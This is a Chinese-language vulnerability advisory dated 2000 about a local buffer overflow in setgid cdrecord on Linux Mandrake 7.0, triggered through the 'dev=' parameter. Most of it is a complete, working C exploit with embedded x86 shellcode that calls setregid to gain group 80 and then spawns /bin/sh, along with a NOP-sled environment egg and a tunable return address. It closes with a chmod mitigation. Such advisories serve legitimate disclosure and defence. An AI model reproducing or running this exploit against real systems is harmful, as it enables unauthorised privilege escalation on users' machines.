Linux cdrecord 缓冲区溢出漏洞
发布日期:2000-05-31
更新日期:2000-05-31
受影响系统:Linux Mandrake 7.0
描述:
cdrecord存在缓冲区溢出漏洞,可能在本地受到这种攻击。缺省安装完
Mandrake 7.0 后,cdrecord是setgid cdburner的,cdburner组ID是80。导
致溢出的关键在于cdrecord没有对参数"dev="进行边界检查。
<* 来源:noir (noir@gsu.linux.org.tr) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* /usr/bin/cdrecord exploit by noir
* x86/Linux
* noir@gsu.linux.org.tr | noir@olympos.org
* dev= param overflow
* this script will get you gid = 80 group cdwriter
* tested on Mandrake 7.0 (Air)
* greetz: dustdevil, Cronos, moog, still, BlaCK #olympos irc.sourtimes.org
*/
#include <stdio.h>
#include <string.h>
#define NOP 0x90
#define RET 0xbffffe66 //play with argv[1] +10, -10 if default is not ok
int main ( int argc, char * argv[] )
{
u_char shell[] =
"\x31\xc0\xb0\x50\x89\xc3\x89\xc1\xb0\x47\xcd\x80" /*setregid(80, 80) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char egg[400];
char buf[80];
int i, a;
long ret = RET;
if ( argv[1] )
{
ret = ret - atoi( argv[1] );
}
memset( egg, NOP, 400 );
for ( i = 0 ; i < 80 ; i += 4 )
{
*( long * )&buf[i] = ret;
}
for ( i = 300, a = 0; a < strlen( shell ); i++, a++ )
{
egg[i] = shell[a];
}
buf[72] = 0x00;
egg[399] = 0x00;
printf( "eip: 0x%x\n", ret );
setenv( "EGG", egg, 1 );
execl( "/usr/bin/cdrecord", "cdrecord", "dev=", buf, "/etc/passwd", 0 );
} /* end of main */
建议:
在没有提供补丁之前,一个临时解决方案就是
chmod g-s /usr/bin/cdrecord
浏览次数:6043
严重程度:0(网友投票)
